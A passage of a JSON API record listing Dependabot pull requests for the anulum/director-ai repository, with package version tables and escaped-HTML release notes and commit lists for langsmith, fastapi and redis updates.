view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.4 to 0.8.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): add JS Dockerfile snapshots by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2951\"\u003elangchain-ai/langsmith-sdk#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the js-minor-and-patch group across 1 directory with 11 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2931\"\u003elangchain-ai/langsmith-sdk#2931\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump websockets from 15.0.1 to 16.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2811\"\u003elangchain-ai/langsmith-sdk#2811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update myst-parser requirement from \u0026gt;=3 to \u0026gt;=4.0.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2841\"\u003elangchain-ai/langsmith-sdk#2841\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump the py-minor-and-patch group across 1 directory with 19 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2934\"\u003elangchain-ai/langsmith-sdk#2934\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump typescript from 5.9.3 to 6.0.3 in /js by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2839\"\u003elangchain-ai/langsmith-sdk#2839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump google-adk from 1.10.0 to 2.1.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2960\"\u003elangchain-ai/langsmith-sdk#2960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump wrapt from 1.17.3 to 2.2.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2961\"\u003elangchain-ai/langsmith-sdk#2961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the py-minor-and-patch group in /python with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2958\"\u003elangchain-ai/langsmith-sdk#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump types-tqdm from 4.67.3.20260408 to 4.67.3.20260518 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2959\"\u003elangchain-ai/langsmith-sdk#2959\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add minimum workflow permissions by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2967\"\u003elangchain-ai/langsmith-sdk#2967\u003c...\n\n_Description has been truncated_","html_url":"https://github.com/anulum/director-ai/pull/77","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/anulum%2Fdirector-ai/issues/77","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/77/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-05T01:56:24.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4593508745","node_id":"PR_kwDORyXkV87i7KSg","number":9,"state":"closed","title":"Bump the python-dependencies group across 1 directory with 21 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-12T01:58:12.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-05T01:56:24.000Z","updated_at":"2026-06-12T01:58:14.000Z","time_to_close":604908,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"python-dependencies","update_count":21,"packages":[{"name":"fastapi","old_version":"0.135.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"redis","old_version":"7.3.0","new_version":"8.0.0","repository_url":"https://github.com/redis/redis-py"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pre-commit","old_version":"4.5.1","new_version":"4.6.0","repository_url":"https://github.com/pre-commit/pre-commit"},{"name":"boto3","old_version":"1.42.68","new_version":"1.43.23","repository_url":"https://github.com/boto/boto3"},{"name":"celery","old_version":"5.6.2","new_version":"5.6.3","repository_url":"https://github.com/celery/celery"},{"name":"authlib","old_version":"1.6.9","new_version":"1.7.2","repository_url":"https://github.com/authlib/authlib"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"uvicorn","old_version":"0.42.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"prometheus-fastapi-instrumentator","old_version":"7.1.0","new_version":"8.0.0","repository_url":"https://github.com/trallnag/prometheus-fastapi-instrumentator"},{"name":"python-json-logger","old_version":"4.0.0","new_version":"4.1.0","repository_url":"https://github.com/nhairs/python-json-logger"},{"name":"sentry-sdk","old_version":"2.54.0","new_version":"2.61.1","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"flagsmith","old_version":"5.1.1","new_version":"5.4.0"},{"name":"werkzeug","old_version":"3.1.6","new_version":"3.1.8","repository_url":"https://github.com/pallets/werkzeug"},{"name":"pyroscope-io","old_version":"1.0.4","new_version":"1.0.11"},{"name":"mypy","old_version":"1.19.1","new_version":"2.1.0","repository_url":"https://github.com/python/mypy"},{"name":"ruff","old_version":"0.15.6","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"pytest","old_version":"9.0.2","new_version":"9.0.3","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"pytest-cov","old_version":"7.0.0","new_version":"7.1.0","repository_url":"https://github.com/pytest-dev/pytest-cov"},{"name":"httpx-ws","old_version":"0.8.2","new_version":"0.9.0","repository_url":"https://github.com/frankie567/httpx-ws"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-dependencies group with 21 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.1` | `0.136.3` |\n| [redis](https://github.com/redis/redis-py) | `7.3.0` | `8.0.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [pre-commit](https://github.com/pre-commit/pre-commit) | `4.5.1` | `4.6.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.68` | `1.43.23` |\n| [celery](https://github.com/celery/celery) | `5.6.2` | `5.6.3` |\n| [authlib](https://github.com/authlib/authlib) | `1.6.9` | `1.7.2` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.42.0` | `0.49.0` |\n| [prometheus-fastapi-instrumentator](https://github.com/trallnag/prometheus-fastapi-instrumentator) | `7.1.0` | `8.0.0` |\n| [python-json-logger](https://github.com/nhairs/python-json-logger) | `4.0.0` | `4.1.0` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.54.0` | `2.61.1` |\n| flagsmith | `5.1.1` | `5.4.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `3.1.6` | `3.1.8` |\n| pyroscope-io | `1.0.4` | `1.0.11` |\n| [mypy](https://github.com/python/mypy) | `1.19.1` | `2.1.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.6` | `0.15.16` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.2` | `9.0.3` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [pytest-cov](https://github.com/pytest-dev/pytest-cov) | `7.0.0` | `7.1.0` |\n| [httpx-ws](https://github.com/frankie567/httpx-ws) | `0.8.2` | `0.9.0` |\n\n\nUpdates `fastapi` from 0.135.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `redis` from 7.3.0 to 8.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/redis/redis-py/releases\"\u003eredis's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.0.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003ch2\u003e🚀 Highlights\u003c/h2\u003e\n\u003ch3\u003eAsync Cluster PubSub\u003c/h3\u003e\n\u003cp\u003eThis release introduces full \u003cstrong\u003easyncio Cluster PubSub support\u003c/strong\u003e, bringing shard-channel capabilities (\u003ccode\u003eSSUBSCRIBE\u003c/code\u003e, \u003ccode\u003eSUNSUBSCRIBE\u003c/code\u003e, \u003ccode\u003eSPUBLISH\u003c/code\u003e) to the async \u003ccode\u003eRedisCluster\u003c/code\u003e client. The new \u003ccode\u003eClusterPubSub\u003c/code\u003e class in \u003ccode\u003eredis.asyncio.cluster\u003c/code\u003e automatically routes shard-channel subscriptions to the correct cluster node based on key-slot hashing, manages per-node PubSub connections, and supports round-robin message retrieval across nodes. Users can create a cluster pubsub instance via \u003ccode\u003eRedisCluster.pubsub()\u003c/code\u003e and use \u003ccode\u003essubscribe()\u003c/code\u003e, \u003ccode\u003esunsubscribe()\u003c/code\u003e, and \u003ccode\u003eget_sharded_message()\u003c/code\u003e just as they would with the sync cluster client.\u003c/p\u003e\n\u003ch3\u003eKeyspace and subkey notifications\u003c/h3\u003e\n\u003cp\u003eRedis Keyspace Notifications are now supported for standalone and cluster deployments in both sync and async modes. New classes — \u003ccode\u003eKeyspaceNotifications\u003c/code\u003e, \u003ccode\u003eClusterKeyspaceNotifications\u003c/code\u003e, \u003ccode\u003eAsyncKeyspaceNotifications\u003c/code\u003e, and \u003ccode\u003eAsyncClusterKeyspaceNotifications\u003c/code\u003e — provide a high-level API for keyspace/keyevent subscriptions and subkey notification families: \u003ccode\u003esubkeyspace\u003c/code\u003e, \u003ccode\u003esubkeyevent\u003c/code\u003e, \u003ccode\u003esubkeyspaceitem\u003c/code\u003e, and \u003ccode\u003esubkeyspaceevent\u003c/code\u003e. Convenience methods like \u003ccode\u003esubscribe_keyspace()\u003c/code\u003e, \u003ccode\u003esubscribe_keyevent()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyspace()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyevent()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyspaceitem()\u003c/code\u003e, and \u003ccode\u003esubscribe_subkeyspaceevent()\u003c/code\u003e simplify common patterns, with channel classes for both key and subkey channels.\u003c/p\u003e\n\u003cp\u003eIn cluster mode, subscriptions are managed across primary nodes because each node emits notifications only for keys it owns, with built-in topology-change handling. Sync \u003ccode\u003erun_in_thread()\u003c/code\u003e and async \u003ccode\u003elisten()\u003c/code\u003e workflows are supported.\u003c/p\u003e\n\u003ch3\u003eRedis Array commands(\u003ca href=\"https://redis.io/docs/latest/develop/data-types/arrays/\"\u003ehttps://redis.io/docs/latest/develop/data-types/arrays/\u003c/a\u003e)\u003c/h3\u003e\n\u003cp\u003eredis-py now supports \u003ca href=\"https://redis.io/docs/latest/develop/data-types/arrays/\"\u003eRedis Arrays\u003c/a\u003e, a preview Redis data type for sparse, index-addressable sequences of strings. New \u003ccode\u003eAR*\u003c/code\u003e command helpers cover indexed reads/writes, range scans, deletion, cursor-based insertion, ring-buffer writes, metadata, text search, and aggregation, including \u003ccode\u003eARGET\u003c/code\u003e, \u003ccode\u003eARSET\u003c/code\u003e, \u003ccode\u003eARMGET\u003c/code\u003e, \u003ccode\u003eARMSET\u003c/code\u003e, \u003ccode\u003eARSCAN\u003c/code\u003e, \u003ccode\u003eARGREP\u003c/code\u003e, \u003ccode\u003eARRING\u003c/code\u003e, and \u003ccode\u003eAROP\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eType Hints Improvements (breaking changes)\u003c/h3\u003e\n\u003cp\u003eThe \u003ccode\u003e@overload\u003c/code\u003e pattern has been applied systematically across \u003cstrong\u003ecore commands\u003c/strong\u003e 